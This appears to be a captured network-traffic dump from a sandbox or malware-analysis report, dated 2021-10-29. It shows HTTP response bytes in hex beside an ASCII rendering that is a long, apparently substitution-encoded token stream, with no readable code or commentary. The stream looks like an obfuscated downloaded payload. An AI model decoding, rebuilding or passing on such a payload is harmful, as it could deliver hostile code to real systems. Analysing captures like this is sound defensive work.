20 59 74 20 6b 4b 20 4f 4f 4b 20 4f 4f 52 20 4f 4f 6b 20 52 4b 20 4b 6b 20 4b 6b 20 45 74 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 78 20 4f 78 51 20 4f 4f 6f 20 45 59 20 59 78 20 74 45 20 59 6f 20 6b
                                                            Data Ascii: k Otx YK kO OoY OOt OxQ OOE KO x YO YK RY OOK OOt OxQ Oxt Yx Kk EY Yo Kt OOo OOt OxQ OOR QE Yx YO YK ko Oox OtO OxK kR ER Yk oER YK ko kk OOt OxQ OOo YO Eo Yx YK kK OOK OOt OxQ OoR Rx Kk YY Yt kK OOK OOR OOk RK Kk Kk Et YK kK OOK OOx OxQ OOo EY Yx tE Yo k
                                                            2021-10-29 18:10:59 UTC1686INData Raw: 20 59 6f 20 4b 51 20 6b 51 20 6b 45 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 4f 6f 6f 20 6f 45 52 20 59 45 20 6f 78 20 45 6f 20 51 4b 20 4f 74 6f 20 4f 4f 74 20 4f 78 74 20 51 78 20 59 78 20 4b 6b 20 59 4f 20 45 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 52 45 20 52 4f 20 59 4b 20 6b 4f 20 4f 6f 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 4b 4f 20 78 20 4b 6b 20 59 4b 20 52 52 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 78 6b 20 59 78 20 4b 6b 20 45 59 20 59 6f 20 4b 74 20 4f 4f 6f 20 4f 4f 74 20 4f 78 51 20 4f 4f 52 20 4b 51 20 51 59 20 45 52 20 59 59 20 6b 4b 20 4f 4f 52 20 4f 6f 74 20 4f 74 51 20 4f 4f 74 20 6f 78 20 45 6b 20 59 52 20 6f 45 6f 20 6b 4b 20 4f 4f 52 20 51 59 20 4f 78 51 20 4f 4f 6f 20 59 4f 20 45 6f 20 59 78 20 59
                                                            Data Ascii: Yo KQ kQ kE OOY OOt Oxt Ooo oER YE ox Eo QK Oto OOt Oxt Qx Yx Kk YO Ek kK OOK OOt OxQ OOo Yx RE RO YK kO OoY OOt OxQ OOE KO x Kk YK RR OOK OOt OxQ Oxk Yx Kk EY Yo Kt OOo OOt OxQ OOR KQ QY ER YY kK OOR Oot OtQ OOt ox Ek YR oEo kK OOR QY OxQ OOo YO Eo Yx Y
                                                            2021-10-29 18:10:59 UTC1688INData Raw: 51 20 4f 78 6f 20 59 78 20 4b 6b 20 59 78 20 4b 6f 20 6b 4b 20 4f 4f 4b 20 4f 78 78 20 4f 4f 4f 20 4f 4f 20 4b 6b 20 4b 6b 20 59 78 20 59 78 20 6b 74 20 6f 51 20 4f 78 6f 20 4f 78 6b 20 4f 4f 6f 20 59 6f 20 59 6b 20 6f 45 52 20 59 4f 20 4f 4f 4b 20 4f 78 78 20 4f 6f 74 20 4f 74 51 20 4f 4f 6f 20 59 6f 20 6f 52 20 59 78 20 59 4b 20 6b 59 20 51 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 74 20 51 4f 20 4f 4f 4b 20 4f 4f 6f 20 51 6b 20 4f 4f 6f 20 59 78 20 4b 51 20 4b 4f 20 52 20 6b 52 20 4f 4f 4b 20 51 51 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 4b 20 59 78 20 59 4b 20 52 51 20 4f 4f 6f 20 4f 4b 20 4f 4f 4f 20 4f 4f 6f 20 59 78 20 59 6f 20 4b 51 20 6b 51 20 51 4b 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 4f 6f 6f 20 6f 45 52 20 59 45
                                                            Data Ascii: Q Oxo Yx Kk Yx Ko kK OOK Oxx OOO OO Kk Kk Yx Yx kt oQ Oxo Oxk OOo Yo Yk oER YO OOK Oxx Oot OtQ OOo Yo oR Yx YK kY Qk OOt OxQ OOo Yx Kk Yx Yt QO OOK OOo Qk OOo Yx KQ KO R kR OOK QQ OxQ OOo Yx KK Yx YK RQ OOo OK OOO OOo Yx Yo KQ kQ QK OOY OOt Oxt Ooo oER YE
                                                            2021-10-29 18:10:59 UTC1689INData Raw: 4f 4f 52 20 51 59 20 4f 78 6b 20 51 52 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 78 45 20 4f 6f 74 20 4f 4f 6f 20 52 6f 20 52 45 20 59 78 20 59 4b 20 6b 59 20 4f 78 59 20 52 51 20 4f 4f 78 20 4f 4f 6f 20 4b 6f 20 4b 6b 20 59 78 20 59 4b 20 74 51 20 4f 4f 4b 20 4f 4f 74 20 4f 6f 4b 20 4f 4f 4b 20 74 45 20 59 78 20 59 78 20 59 4b 20 6b 78 20 4f 4f 45 20 4f 4f 45 20 6f 20 4f 78 59 20 59 4f 20 4b 6b 20 59 6f 20 45 45 20 51 4b 20 4f 74 6f 20 4f 4f 6f 20 74 59 20 4f 78 6f 20 59 52 20 6f 45 6b 20 59 78 20 4b 6b 20 4f 6f 52 20 4f 4f 59 20 4f 78 4f 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 52 51 20 51 51 20 4f 4f 74 20 4f 78 4b 20 4f 6f 74 20 59 78 20 4b 6b 20 59 4f 20 4f 6f 20 6b 52 20 4f 78 4f 20 6f 52 20 45 52 20 4f 4f
                                                            Data Ascii: OOR QY Oxk QR Yx Kk Yx YK kK OOK OxE Oot OOo Ro RE Yx YK kY OxY RQ OOx OOo Ko Kk Yx YK tQ OOK OOt OoK OOK tE Yx Yx YK kx OOE OOE o OxY YO Kk Yo EE QK Oto OOo tY Oxo YR oEk Yx Kk OoR OOY OxO OxQ OOo Yx Kk Yx YK RQ QQ OOt OxK Oot Yx Kk YO Oo kR OxO oR ER OO
                                                            2021-10-29 18:10:59 UTC1690INData Raw: 4f 4f 20 51 6b 20 59 52 20 74 6b 20 59 59 20 59 4b 20 6b 4b 20 4f 4f 6b 20 4f 4f 20 4f 78 52 20 4f 4f 6f 20 59 78 20 59 6f 20 6f 52 20 6f 74 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 52 51 20 4f 51 59 20 59 4f 20 4b 6b 20 59 6f 20 45 51 20 51 4b 20 4f 6f 74 20 4f 4f 20 4f 78 4f 20 4f 4f 6f 20 59 78 20 59 6f 20 6f 52 20 4f 6b 51 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 4f 6f 52 20 4f 4f 52 20 6f 59 20 59 6b 20 4f 6b 20 4f 51 78 20 74 4f 20 4f 4f 4b 20 4f 4f 74 20 52 51 20 6f 45 51 20 59 78 20 4b 6b 20 59 52 20 45 51 20 6b 78 20 4f 4f 52 20 4f 6f 59 20 4f 6f 74 20 4f 4f 59 20 51 45 20 4f 6b 59 20 59 78 20 59 4b 20 6b 6f 20 51 4b 20 4f 59 52 20 4f 78 78 20 51 51 20 59 59 20 45 4b 20 59 59 20 52 51 20 6f 4f 52 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 6b 6b 20 4f 4b 45 20
                                                            Data Ascii: OO Qk YR tk YY YK kK OOk OO OxR OOo Yx Yo oR ot kK OOK OOY RQ OQY YO Kk Yo EQ QK Oot OO OxO OOo Yx Yo oR OkQ kK OOK OOY OoR OOR oY Yk Ok OQx tO OOK OOt RQ oEQ Yx Kk YR EQ kx OOR OoY Oot OOY QE OkY Yx YK ko QK OYR Oxx QQ YY EK YY RQ oOR OOY OOt Oxt kk OKE
                                                            2021-10-29 18:10:59 UTC1692INData Raw: 6b 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 45 78 20 4f 4f 4b 20 4b 6b 20 4b 6b 20 59 6f 20 52 78 20 74 59 20 4f 6f 59 20 6f 4b 6b 20 51 51 20 4f 4f 6f 20 59 78 20 59 78 20 6f 45 20 45 6f 20 52 4b 20 4f 4b 78 20 4f 4f 59 20 59 45 20 4f 4f 6f 20 59 78 20 59 4b 20 52 59 20 4f 6b 45 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 6f 78 74 20 6b 59 20 45 74 20 45 52 20 6f 78 4b 20 4b 6b 20 4f 45 20 4f 4f 4b 20 4f 4f 74 20 4f 78 74 20 45 20 4f 74 51 20 4b 6b 20 59 78 20 4b 6b 20 6f 4b 52 20 6b 74 20 4f 78 51 20 4f 6f 4f 20 4f 4b 6f 20 59 6f 20 4f 78 52 20 59 78 20 59 4b 20 6b 6f 20 4f 20 6f 4b 4b 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 4f 4b 52 20 6f 45 20 4b 74 20 52 4b 20 4f 4b 78 20 4f 4f 59 20 59 4b 20 4f 4f 6f 20 59 78 20 59 4b 20 52 59 20 4f 6b 45 20 6b 4b 20 4f 4f 4b 20
                                                            Data Ascii: kk kK OOK OOY Ex OOK Kk Kk Yo Rx tY OoY oKk QQ OOo Yx Yx oE Eo RK OKx OOY YE OOo Yx YK RY OkE kK OOK OOY oxt kY Et ER oxK Kk OE OOK OOt Oxt E OtQ Kk Yx Kk oKR kt OxQ OoO OKo Yo OxR Yx YK ko O oKK OxQ OOo Yo OKR oE Kt RK OKx OOY YK OOo Yx YK RY OkE kK OOK
                                                            2021-10-29 18:10:59 UTC1693INData Raw: 4b 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 59 6f 20 6f 78 52 20 59 6f 20 59 78 20 6b 52 20 4f 4f 4b 20 4f 4f 59 20 45 78 20 6f 4f 45 20 59 78 20 4b 6b 20 59 52 20 45 78 20 52 6b 20 4f 4f 4b 20 4f 4f 74 20 74 78 20 6b 6b 20 45 59 20 4b 6b 20 59 78 20 6f 51 20 4f 6f 4b 20 6f 59 78 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 6f 4b 20 6f 6f 20 4b 51 20 59 78 20 6b 4f 20 51 78 20 59 6b 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 6f 52 20 59 78 20 59 4b 20 74 51 20 52 52 20 4f 4f 45 20 4f 78 51 20 59 74 20 59 4f 20 4b 6b 20 59 78 20 4b 4f 20 6b 4b 20 4f 4f 4b 20 4f 78 78 20 4f 78 59 20 45 20 4f 51 78 20 4b 51 20 59 78 20 4b 6b 20 4f 4f 45 20 4f 20 6f 4f 78 20 4f 78 51 20 4f 4f 6f 20 59 52 20 51 59 20 51 45 20 59 59 20 6b 4b 20 4f 4f 52 20 6b 78 20 45 78 20 4f 78 59 20 59
                                                            Data Ascii: KY OOt OxQ OOk Yo oxR Yo Yx kR OOK OOY Ex oOE Yx Kk YR Ex Rk OOK OOt tx kk EY Kk Yx oQ OoK oYx OOt OxQ OOk oK oo KQ Yx kO Qx Yk OxQ OOo Yo oR Yx YK tQ RR OOE OxQ Yt YO Kk Yx KO kK OOK Oxx OxY E OQx KQ Yx Kk OOE O oOx OxQ OOo YR QY QE YY kK OOR kx Ex OxY Y
                                                            2021-10-29 18:10:59 UTC1694INData Raw: 4f 4f 45 20 59 78 20 4b 6b 20 59 78 20 4f 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 52 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 6f 4f 52 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 6f 52 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 51 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 45 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 52 4f 20 4b 6b 20 59 78 20 59 59 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 4f 4f 51 20 6b 59 20 4f 4f 4b 20 4f 4f 74 20 4b 4b 20 4f 4f 45 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 6b 4b 20 4f 4f 4b 20 6b 4f 20 4f 78 51 20 4f 4f 6f 20 59 4f 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4f 4f 59 20 4b 51 20 59 78 20 59 4b 20 6f 6f 20 4f 4f 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 74 20 59
                                                            Data Ascii: OOE Yx Kk Yx Ok kK OOK OOR OxQ OOo Yx Kk oOR YK kK OOK OoR OxQ OOo Yx OQk Yx YK kK OOE OOt OxQ OOo RO Kk Yx YY kK OOK OOt OxQ OOo Yx Kk Yx OOQ kY OOK OOt KK OOE Yx Kk YO YK kK OOK kO OxQ OOo YO Kk Yx YK kK OOK OOt OxQ OOo OOY KQ Yx YK oo OOY OOt OxQ OOt Y
                                                            2021-10-29 18:10:59 UTC1696INData Raw: 20 59 78 20 59 4b 20 51 4b 20 6f 51 20 4f 51 4b 20 4f 78 51 20 4f 4f 6f 20 59 52 20 6f 4b 20 4f 45 51 20 59 59 20 6b 4b 20 4f 4f 52 20 4f 4f 45 20 52 51 20 4f 59 78 20 59 78 20 4b 6b 20 59 6f 20 45 78 20 6f 6f 74 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 51 78 20 45 45 20 78 20 52 6f 20 59 4b 20 4f 51 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 78 20 4b 6f 20 4f 4f 74 20 4f 4f 52 20 4f 78 51 20 4f 4f 52 20 45 4f 20 6f 78 20 45 52 20 6f 45 78 20 4f 6f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 6b 6b 20 4f 45 6b 20 4b 6b 20 59 78 20 52 78 20 4f 45 6f 20 4f 6f 52 20 4f 4f 74 20 4f 78 51 20 4f 4f 4b 20 6f 52 20 4f 45 52 20 59 78 20 59 4b 20 51 4b 20 51 78 20 6f 78 4b 20 4f 78 51 20 4f 4f 6f 20 59 52 20 6f 4b 20 4f 45 52 20 59
                                                            Data Ascii: Yx YK QK oQ OQK OxQ OOo YR oK OEQ YY kK OOR OOE RQ OYx Yx Kk Yo Ex oot OOY OOt Oxt Qx EE x Ro YK OQK OOK OOt OxQ OOo Yx Kk Yx Yx Ko OOt OOR OxQ OOR EO ox ER oEx Oo OOK OOt Oxk kk OEk Kk Yx Rx OEo OoR OOt OxQ OOK oR OER Yx YK QK Qx oxK OxQ OOo YR oK OER Y
                                                            2021-10-29 18:10:59 UTC1697INData Raw: 59 51 20 6f 6f 52 20 4f 4f 52 20 4f 78 51 20 4f 4f 6b 20 45 59 20 59 6f 20 51 45 20 6f 4b 78 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 4f 4f 20 4f 4f 6b 20 51 45 20 4f 78 20 59 78 20 59 4b 20 6b 6f 20 6b 74 20 4f 78 51 20 51 4b 20 4f 6f 78 20 4b 6b 20 59 4f 20 59 4b 20 45 78 20 4f 6f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 74 20 4f 78 59 20 4f 20 59 4b 20 52 59 20 4f 59 74 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 6f 45 20 51 78 20 59 78 20 4b 6b 20 59 4f 20 4b 6f 20 6b 4b 20 4f 4f 4b 20 4f 4f 51 20 4f 78 51 20 51 74 20 59 78 20 4b 4b 20 45 4f 20 59 4b 20 51 78 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4b 6b 20 4b 6b 20 4f 4f 52 20 59 4b 20 74 6f 20 4f 52 20 4f 4f 74 20 51 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 4f 74 52 20 6b 52 20 51 78 20 4f 74 4f 20 4f
                                                            Data Ascii: YQ ooR OOR OxQ OOk EY Yo QE oKx kK OOK Oot OOO OOk QE Ox Yx YK ko kt OxQ QK Oox Kk YO YK Ex Oo OOK OOt Oxt OxY O YK RY OYt kK OOK Oot oE Qx Yx Kk YO Ko kK OOK OOQ OxQ Qt Yx KK EO YK Qx OOK OOt OxQ OOo Kk Kk OOR YK to OR OOt QQ OOo Yx Kk Yx OtR kR Qx OtO O
                                                            2021-10-29 18:10:59 UTC1698INData Raw: 4f 6f 6f 20 59 6f 20 59 4f 20 51 45 20 6b 4f 20 6b 59 20 4f 4f 4b 20 4f 4f 59 20 52 51 20 4f 6f 59 20 59 78 20 4b 6b 20 59 6f 20 6b 51 20 4f 59 74 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 4f 4f 4b 20 59 6f 20 51 59 20 74 20 59 4b 20 6b 4b 20 4f 4f 52 20 6b 78 20 4f 4f 74 20 52 74 20 59 6b 20 59 78 20 4b 51 20 59 78 20 4f 6f 4b 20 4f 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 4b 45 20 45 20 59 6f 20 52 51 20 6f 59 59 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 4f 78 20 6f 4b 20 4f 4b 6f 20 4b 51 20 6b 51 20 74 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 51 6f 20 6f 78 20 59 78 20 4b 51 20 6b 51 20 59 59 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 6b 6b 20 4f 6b 51 20 4b 6b 20 59 78 20 4b 6b 20 59 51 20 4b 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 6f 45 20 4b 78 20 4f 20 52
                                                            Data Ascii: Ooo Yo YO QE kO kY OOK OOY RQ OoY Yx Kk Yo kQ OYt OOK OOt OxE OOK Yo QY t YK kK OOR kx OOt Rt Yk Yx KQ Yx OoK Ok OOt OxQ OOk KE E Yo RQ oYY OOK OOt OxE Ox oK OKo KQ kQ t OOY OOt Oxt Qo ox Yx KQ kQ YY OOY OOt Oxt kk OkQ Kk Yx Kk YQ Kk OOt OxQ OOk oE Kx O R
                                                            2021-10-29 18:10:59 UTC1700INData Raw: 6b 20 59 78 20 4b 6b 20 59 51 20 74 74 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 6f 78 20 59 78 20 45 74 20 4f 6b 74 20 4f 6f 74 20 4f 4f 4b 20 4f 4f 74 20 4f 4f 4f 20 6b 59 20 45 52 20 52 74 20 4f 59 59 20 59 4b 20 6b 4b 20 4f 4f 52 20 6f 4f 59 20 52 51 20 6f 59 45 20 59 78 20 4b 6b 20 59 6f 20 6b 51 20 6f 4f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 74 20 6b 52 20 6f 4b 20 4b 6b 20 59 78 20 59 4b 20 74 4f 20 52 52 20 4f 4f 6f 20 4f 78 51 20 4f 51 6f 20 59 4f 20 4b 6b 20 59 78 20 4f 51 20 6b 4b 20 4f 4f 4b 20 4f 78 78 20 4f 4f 4f 20 6b 6b 20 4f 6b 4b 20 4b 6b 20 59 78 20 4b 6b 20 45 51 20 4f 4f 51 20 4f 4f 51 20 4f 78 51 20 4f 4f 6b 20 59 52 20 4b 74 20 52 4f 20 4f 6b 74 20 51 78 20 4f 4f 4b 20 4f 4f 74 20 4f 4f 4f 20 6b 59 20 45 52 20 45 52 20 6f 78 4b 20 4b 6b 20
                                                            Data Ascii: k Yx Kk YQ tt OOt OxQ OOk ox Yx Et Okt Oot OOK OOt OOO kY ER Rt OYY YK kK OOR oOY RQ oYE Yx Kk Yo kQ oO OOK OOt Oxt kR oK Kk Yx YK tO RR OOo OxQ OQo YO Kk Yx OQ kK OOK Oxx OOO kk OkK Kk Yx Kk EQ OOQ OOQ OxQ OOk YR Kt RO Okt Qx OOK OOt OOO kY ER ER oxK Kk
                                                            2021-10-29 18:10:59 UTC1701INData Raw: 6b 4b 20 4f 4f 52 20 6f 4f 59 20 52 51 20 6f 4b 6b 20 59 78 20 4b 6b 20 59 6f 20 4b 6b 20 45 51 20 6f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 74 51 20 59 52 20 59 4f 20 59 4b 20 6b 78 20 51 78 20 6f 4b 78 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 59 4b 20 6f 78 4b 20 4b 6b 20 6b 6f 20 4f 4f 6f 20 4f 4f 74 20 4f 78 74 20 45 20 4f 59 4f 20 4b 6b 20 59 78 20 52 78 20 4f 6f 4b 20 51 6b 20 4f 4f 74 20 4f 78 51 20 51 4f 20 6f 52 20 45 45 20 59 78 20 59 4b 20 4f 6f 74 20 51 78 20 6f 4b 45 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 6f 4b 20 4f 6b 4f 20 59 4b 20 6b 4b 20 4f 4f 52 20 4f 4f 59 20 4f 4b 74 20 4f 4f 6b 20 59 45 20 59 78 20 59 78 20 4b 6b 20 45 51 20 6f 4f 59 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 6f 52 20 45 6f 20 59 78 20 59 4b 20 4f 6f 74 20 51 78 20 4f 78
                                                            Data Ascii: kK OOR oOY RQ oKk Yx Kk Yo Kk EQ oOK OOt OxQ Ooo tQ YR YO YK kx Qx oKx OxQ OOo Yo YK oxK Kk ko OOo OOt Oxt E OYO Kk Yx Rx OoK Qk OOt OxQ QO oR EE Yx YK Oot Qx oKE OxQ OOo Yo oK OkO YK kK OOR OOY OKt OOk YE Yx Yx Kk EQ oOY OOt OxQ Ooo oR Eo Yx YK Oot Qx Ox
                                                            2021-10-29 18:10:59 UTC1702INData Raw: 20 4f 4f 6f 20 59 78 20 4b 6b 20 6f 4f 52 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 6f 52 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 51 74 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 6f 6f 20 4b 6b 20 59 78 20 59 59 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 59 4b 20 59 78 20 4b 6b 20 59 78 20 52 4f 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 59 59 20 4f 4f 6f 20 59 78 20 4b 6b 20 4b 51 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 6f 6f 20 4f 78 51 20 4f 4f 6f 20 59 4f 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4b 74 20 4b 51 20 59 78 20 59 4b 20 74 45 20 4f 4f 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 59 78 20 4b 6b 20 59 78 20 4f 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 52 20 4f 78 51 20 4f 4f 6f 20
                                                            Data Ascii: OOo Yx Kk oOR YK kK OOK OoR OxQ OOo Yx OQt Yx YK kK OOY OOt OxQ OOo oo Kk Yx YY kK OOK OOt OxQ OYK Yx Kk Yx RO kK OOK OOt OYY OOo Yx Kk KQ YK kK OOK Ooo OxQ OOo YO Kk Yx YK kK OOK OOt OxQ OOo Kt KQ Yx YK tE OOY OOt OxQ OOE Yx Kk Yx Ok kK OOK OOR OxQ OOo
                                                            2021-10-29 18:10:59 UTC1704INData Raw: 4f 59 20 74 4f 20 6f 4b 52 20 59 4b 20 6f 4b 20 4f 45 59 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 6f 4f 51 20 4f 4f 6f 20 59 78 20 59 6b 20 51 45 20 4f 6f 51 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 52 51 20 6f 78 4f 20 59 4f 20 4b 6b 20 59 6f 20 59 78 20 4f 6f 4b 20 4f 4b 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 6f 52 20 4f 45 59 20 59 4f 20 59 4b 20 6b 6f 20 6b 6b 20 4f 78 6f 20 51 45 20 4f 6f 4b 20 59 78 20 4f 52 52 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 74 6b 20 59 52 20 59 59 20 6b 4b 20 4f 4f 6b 20 6b 6b 20 74 45 20 4f 78 6f 20 6f 6f 52 20 4f 78 4b 20 59 78 20 59 4b 20 6b 59 20 51 78 20 6f 78 59 20 4f 78 51 20 4f 4f 6f 20 59 52 20 6f 6f 4b 20 52 45 20 59 4b 20 6b 4b 20 4f 4f 6f 20 51 45 20 6f 4f 45 20 4f
                                                            Data Ascii: OY tO oKR YK oK OEY YK kK Oox oR oOQ OOo Yx Yk QE OoQ kK OOK Oot RQ oxO YO Kk Yo Yx OoK OKk OOt OxQ OOk oR OEY YO YK ko kk Oxo QE OoK Yx ORR Yx YK kK OOK OOt OxQ OOo YK tk YR YY kK OOk kk tE Oxo ooR OxK Yx YK kY Qx oxY OxQ OOo YR ooK RE YK kK OOo QE oOE O
                                                            2021-10-29 18:10:59 UTC1705INData Raw: 20 59 4f 20 4b 6b 20 59 6f 20 45 51 20 6b 78 20 51 78 20 4f 4b 4b 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 51 59 20 4f 52 6f 20 59 59 20 6b 4b 20 4f 4f 52 20 4f 78 78 20 4f 78 59 20 45 4f 20 6f 4b 4b 20 4b 6b 20 59 78 20 52 78 20 6b 78 20 51 78 20 6f 78 4f 20 4f 78 6b 20 4f 4f 6f 20 59 6f 20 59 4b 20 51 45 20 52 74 20 6b 59 20 4f 4f 4b 20 4f 4f 59 20 74 4f 20 4f 4f 6f 20 59 78 20 4b 51 20 4b 52 20 59 4b 20 6b 4b 20 4f 4f 6f 20 4f 4f 74 20 4f 6f 4b 20 4f 4f 6f 20 4b 52 20 6f 51 20 59 78 20 59 52 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 4b 20 59 78 20 4f 4f 6b 20 59 78 20 4b 6f 20 59 4b 20 4f 4f 4b 20 4f 6f 45 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 4f 4f 52 20 59 78 20 4f 6f 4b 20 6f 78 52 20 4f 4f 52 20 4f 78 51 20 4f 4f 6b 20 6f 52 20 6f 45
                                                            Data Ascii: YO Kk Yo EQ kx Qx OKK OxQ OOo Yo QY ORo YY kK OOR Oxx OxY EO oKK Kk Yx Rx kx Qx oxO Oxk OOo Yo YK QE Rt kY OOK OOY tO OOo Yx KQ KR YK kK OOo OOt OoK OOo KR oQ Yx YR kK OOK OOt OxQ OOK Yx OOk Yx Ko YK OOK OoE OxQ OOo Yx Kk OOR Yx OoK oxR OOR OxQ OOk oR oE
                                                            2021-10-29 18:10:59 UTC1706INData Raw: 59 20 51 45 20 6b 59 20 59 4f 20 59 4b 20 6b 6f 20 6f 51 20 6f 6f 59 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 4b 78 20 4f 51 4f 20 6f 51 20 6b 4b 20 4f 4f 4b 20 4f 4f 51 20 74 6f 20 4f 78 6f 20 52 59 20 4f 52 45 20 59 78 20 59 4b 20 6b 6f 20 6f 78 6b 20 6b 78 20 4f 6f 6f 20 4f 4f 6b 20 4f 4b 4b 20 6f 4b 20 4f 51 4f 20 59 4b 20 6b 4b 20 4f 4f 52 20 4f 6f 52 20 4f 78 52 20 4f 4f 59 20 51 45 20 6b 51 20 59 4f 20 59 4b 20 6b 6f 20 51 78 20 6f 4b 51 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 51 59 20 6f 4b 6b 20 59 4b 20 6b 4b 20 4f 6f 78 20 4f 4f 45 20 52 51 20 6f 78 4b 20 59 4f 20 4b 6b 20 59 6f 20 4b 51 20 59 51 20 6f 4b 45 20 4f 4f 52 20 4f 78 51 20 4f 4f 6b 20 6f 4b 20 4f 52 52 20 4b 51 20 6b 51 20 59 45 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 51 6f 20 4b 52 20 59 6f
                                                            Data Ascii: Y QE kY YO YK ko oQ ooY OxQ OOo Yo Kx OQO oQ kK OOK OOQ to Oxo RY ORE Yx YK ko oxk kx Ooo OOk OKK oK OQO YK kK OOR OoR OxR OOY QE kQ YO YK ko Qx oKQ OxQ OOo Yo QY oKk YK kK Oox OOE RQ oxK YO Kk Yo KQ YQ oKE OOR OxQ OOk oK ORR KQ kQ YE OOY OOt Oxt Qo KR Yo
                                                            2021-10-29 18:10:59 UTC1710INData Raw: 51 20 51 59 20 6f 45 20 59 4b 20 6b 4b 20 4f 6f 78 20 6b 51 20 4f 78 4b 20 4f 78 45 20 45 45 20 59 4b 20 6f 59 20 52 45 20 74 78 20 4f 6f 6f 20 51 45 20 6b 6b 20 4f 4f 6f 20 59 78 20 59 6b 20 45 4f 20 6f 45 6f 20 4f 45 6b 20 4f 6f 4b 20 4f 78 45 20 4f 78 4f 20 4f 4b 6f 20 45 52 20 59 52 20 59 78 20 59 4b 20 74 51 20 6f 51 20 4f 6f 52 20 4f 78 51 20 4f 4f 6f 20 59 52 20 6f 45 52 20 45 59 20 4b 6b 20 4f 4f 78 20 4f 74 52 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 45 45 20 59 59 20 52 51 20 4b 6b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 51 51 20 59 52 20 45 45 20 59 52 20 6b 51 20 4f 45 59 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 51 51 20 59 45 20 45 6b 20 45 45 20 52 4f 20 52 52 20 51 74 20 4f 6f 4f 20 74 78 20 59 74 20 45 59 20 59 51 20 45 4f 20 4f 6f 45
